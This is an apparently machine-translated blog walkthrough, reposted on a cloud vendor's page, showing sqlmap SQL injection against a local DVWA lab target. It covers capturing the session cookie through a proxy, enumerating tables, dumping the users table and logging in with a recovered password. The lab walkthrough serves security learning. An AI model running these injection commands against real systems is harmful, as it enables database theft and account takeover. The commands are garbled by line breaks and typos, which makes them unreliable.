Beast Brother produced---->sqlmap injected into the target drone

Last Update:2017-07-11 Source: Internet

Author: User

Developer on Alibaba Coud: Build your first app with APIs, SDKs, and tutorials on the Alibaba Cloud. Read more ＞

Sqlmap Practice-----> Godless own target drone

Today, the beast is ready to take out some dry goods for everyone to taste, is salty is sweet from any taste

target drone before the article said Build an environment with phpstudy link Dvwa

and then, we're going to use the grab bag software to grab dvwa cookies.

Let's take a look at the demo first:

First Enter Dvwa set Difficulty to low (for demonstration convenience)

650) this.width=650; "style=" Float:none; "title=" Picture 1.png "src=" https://s1.51cto.com/wyfs02/M02/9B/98/ Wkiom1lkxasrg0zyaaf4ltwaojs794.png-wh_500x0-wm_3-wmp_4-s_3248892986.png "alt=" Wkiom1lkxasrg0zyaaf4ltwaojs794.png-wh_50 "/>

pick it up . to use a grab to capture the Dvwa login Cookies

first configure the agent, here it is I set the proxy port to default:8080 as shown

650) this.width=650; "style=" Float:none; "title=" Picture 2.png "src=" https://s3.51cto.com/wyfs02/M01/9B/97/ Wkiol1lkxawggir8aadisccpnza480.png-wh_500x0-wm_3-wmp_4-s_3599868340.png "alt=" Wkiol1lkxawggir8aadisccpnza480.png-wh_50 "width=" 729 "height=" 378 "/>

650) this.width=650; "style=" Float:none; "title=" Picture 3.png "src=" https://s2.51cto.com/wyfs02/M02/9B/98/ Wkiom1lkxabwofrpaadxxzsskla363.png-wh_500x0-wm_3-wmp_4-s_179346879.png "alt=" Wkiom1lkxabwofrpaadxxzsskla363.png-wh_50 "width=" 714 "height=" 367 "/>

Open the crawl button Refresh Page

can see

cookies are Security=low; PHPSESSID=M04SK2CHD2M6K381LCQRJUKJA4

so We use cookies for blasting testing

Open Sqlmap Let me do the experiment together.

we have Cookies are therefore injected using cookies

First Use the command:

C:\python27\sqlmap>sqlmap.py-u "http://192.168.20.34/dvwa/vulnerabilities/sqli/

id=aa&submit=submit# "--cookie=" security=low; Phpsessid=m04sk2chd2m6k381lcqrjuk

Ja4 "

650) this.width=650; "style=" Float:none; "title=" Picture 4.png "src=" https://s4.51cto.com/wyfs02/M02/9B/97/ Wkiol1lkxaaryzlsaaeavdptmae431.png-wh_500x0-wm_3-wmp_4-s_3581016244.png "alt=" Wkiol1lkxaaryzlsaaeavdptmae431.png-wh_50 "/>

650) this.width=650; "style=" Float:none; "title=" Picture 5.png "src=" https://s2.51cto.com/wyfs02/M02/9B/97/ Wkiol1lkxafbi0lcaacre2wwypq655.png-wh_500x0-wm_3-wmp_4-s_3034604735.png "alt=" Wkiol1lkxafbi0lcaacre2wwypq655.png-wh_50 "/>

we can see has been injected successfully

then we burst out the table--->

burst dvwa table name command:

C:\python27\sqlmap>sqlmap.py-u "http://192.168.20.34/dvwa/vulnerabilities/sqli/

id=aa&submit=submit# "--cookie=" security=low; Phpsessid=m04sk2chd2m6k381lcqrjuk

Ja4 "-D dvwa--tables

650) this.width=650; "style=" Float:none; "title=" Picture 6.png "src=" https://s4.51cto.com/wyfs02/M00/9B/97/ Wkiol1lkxbytyovfaan6srodok4816.png-wh_500x0-wm_3-wmp_4-s_959341627.png "alt=" Wkiol1lkxbytyovfaan6srodok4816.png-wh_50 "/>

we can see Dvwa There are two forms, one for guestbook and one for users

It's obvious that the users have what we want.

so we're going to burst out the fields below users

Use the command:

C:\python27\sqlmap>sqlmap.p-u "http://192.168.20.34/dvwa/vulnerabilities/sqli/

id=aa&submit=submit# "--cookie=" security=low; Phpsessid=m04sk2chd2m6k381lcqrjuk

ja4 "-D dvwa--tables--dump-t Users

650) this.width=650; "style=" Float:none; "title=" Picture 7.png "src=" https://s1.51cto.com/wyfs02/M00/9B/98/ Wkiom1lkxb2cksggaafn96u3m84537.png-wh_500x0-wm_3-wmp_4-s_1781405268.png "alt=" Wkiom1lkxb2cksggaafn96u3m84537.png-wh_50 "/>

Here, at this time, we can obviously see the users form in the explosion of the account password in a total of 5 groups, so we take an account of the test to see if we can log in

this one looks good. Let's use this:

The account number is:Pablo Password: letmein

650) this.width=650; "style=" Float:none; "title=" Picture 8.png "src=" https://s4.51cto.com/wyfs02/M01/9B/98/ Wkiom1lkxb3yw4whaabg2zekyfa140.png-wh_500x0-wm_3-wmp_4-s_3815716325.png "alt=" Wkiom1lkxb3yw4whaabg2zekyfa140.png-wh_50 "/>650" this.width=650; "style=" Float:none; "title=" Picture 9.png "src=" https ://s4.51cto.com/wyfs02/m00/9b/97/wkiol1lkxb7zf1iraaejrjucjqq456.png-wh_500x0-wm_3-wmp_4-s_4048858774.png "alt=" Wkiol1lkxb7zf1iraaejrjucjqq456.png-wh_50 "/>

Ok, successfully logged in

This article from "Black-emperor" blog, reproduced please contact the author!

Beast Brother produced---->sqlmap injected into the target drone

This article is an English version of an article which is originally in the Chinese language on aliyun.com and is provided for information purposes only. This website makes no representation or warranty of any kind, either expressed or implied, as to the accuracy, completeness ownership or reliability of the article or any translations thereof. If you have any concerns or complaints relating to the article, please send an email, providing a detailed description of the concern or complaint, to info-contact@alibabacloud.com. A staff member will contact you within 5 working days. Once verified, infringing content will be removed immediately.

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

Get Started for Free

Sales Support

1 on 1 presale consultation

Chat Contact Sales
After-Sales Support

24/7 Technical Support 6 Free Tickets per Quarter Faster Response

Open a Ticket
Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.

Learn More

Beast Brother produced---->sqlmap injected into the target drone

Contact Us

What's Trending

Top 10 Tags

Top 10 Keywords

A Free Trial That Lets You Build Big!

Sales Support

After-Sales Support

Beast Brother produced---->sqlmap injected into the target drone

Contact Us

What's Trending

Top 10 Tags

Top 10 Keywords

Trending Topic

A Free Trial That Lets You Build Big!

Sales Support

After-Sales Support